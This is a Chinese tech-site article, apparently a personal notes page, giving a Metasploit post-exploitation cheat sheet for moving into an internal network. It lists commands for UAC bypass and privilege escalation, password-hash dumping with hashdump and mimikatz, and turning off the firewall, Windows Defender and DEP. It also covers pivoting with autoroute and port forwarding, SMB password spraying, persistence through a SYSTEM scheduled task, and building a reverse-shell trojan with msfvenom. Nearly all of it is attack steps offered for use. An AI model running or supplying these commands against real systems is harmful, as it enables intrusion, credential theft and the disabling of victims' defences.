| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> msf代理进内网 -> 正文阅读 |
|
[系统运维]msf代理进内网 |
思路:拿到shell之后先获取最高权限,方法uac绕过提权 然后获取hash,以后用于批量撞库啥的 解决shell内乱码:chcp 65001(在cmd内输入,需要在旧版本的kali输入命令界面的编辑,首选项,编码里改成gbk,新版的没找到改编码的地方,有大佬知道的教教我吧) msf内网穿透进公网,cs传shell给msf1.msf内网穿透进公网,cs传给msf shell linux: ./frpc -f *******85a82:1454793 windows:frpc_windows_amd64.exe -f *********885a82:1518179 前面是用户id,后面是隧道id cs传msf里面名字就随便写就行了,host写穿透的域名,端口写穿透的端口,之前自己定义一万多那个14678 提权UAC 权限提升systeam 提权模块: win7提权漏洞: use post/multi/recon/local_exploit_suggester 有这些提权的可以试试:ms16-075 ,ms16016,ms16032, ms15051, ms14058, ms10_015 详情:https://blog.csdn.net/qq_17204441/article/details/89063097 run post/windows/gather/enum_patches 查看主机打了哪些补丁,有哪些漏洞模块不能使用了 msf获取hash密码hashdump 需要system权限 run post/windows/gather/hashdump 权限要求较低,建议使用 run post/windows/gather/smart_hashdump 这个更详细,检查系统和权限,域,hash,自动getsystem 或者: msv 列出用户名密码hash mimikatz_command -f a:: 帮助 关闭防火墙杀软netsh advfirewall set allprofiles state off 关闭防火墙 net stop windefend 关闭windows自带杀软 defend Bcdedit.exe /set {current} nx Alwaysoff 关闭DEP run killav 开启远程端口:run post/windows/manage/enable_rdp 内网密码撞库use auxiliary/scanner/smb/smb_login 或者hash撞库: msf代理扫内网run autoroute -s 192.168.2.0/24 添加动态路由,最简单好用 或者其他方法: 全局代理,让其他工具也能用: 扫内网: use auxiliary/scanner/portscan/tcp 扫描端口 使用auxiliary/scanner/smb/smb_version模块扫描一下各网段的smb服务 扫描永恒之蓝存在 portfwd add -l 6666 -p 3389 -r 127.0.0.1 把目标机的3389端口代理到本地6666,可直接远程本地登录目标 权限维持run metsvc -A 通过服务启动,可能不太好使 schtasks /create /TN cs /s 192.168.0.1 /TR C:\artifact.exe /SC ONSTART /RU system /f 设置计划任务 msf基础命令,信息收集msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.120 lport=4444 -f exe >/home/shell.exe 生成木马 查看有没有域:net config workstation , shell systemnifo ping 域控的主机名得到他们的 IP ipc$ : pwd或getwd 目标主机当前处于哪个目录 不太重要:run post/windows/gather/enum_shares 查看主机开了哪些共享文件,获取浏览器历史啥的 身份伪造: impersonate_token 伪造要伪造的token,用户要加2个\ 防止转译后报错 |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/15 0:40:52- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |